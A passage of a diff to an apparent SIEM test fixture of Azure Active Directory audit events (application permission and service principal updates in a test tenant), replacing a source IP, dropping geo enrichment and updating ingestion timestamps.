},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124832900Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1037807Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438635\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"8f6eb24b-6e61-4ee2-a376-31368c300613\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -569,25 +515,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -601,7 +529,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -724,7 +652,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -736,12 +664,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036081200Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124839500Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:33:26.1638042Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38438642\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1_00000000-0000-0000-0000-000000000000_ba86b8f0-5f6f-4a47-b90a-c1fca908a5d1\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"b2cc2456-5ac5-4399-b960-82a40036476f\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -767,25 +695,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -799,7 +709,7 @@ "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -922,7 +832,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { @@ -934,12 +844,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036088500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:33:26\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"528b5206-f6de-4c1f-86db-5f750a9960c9\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\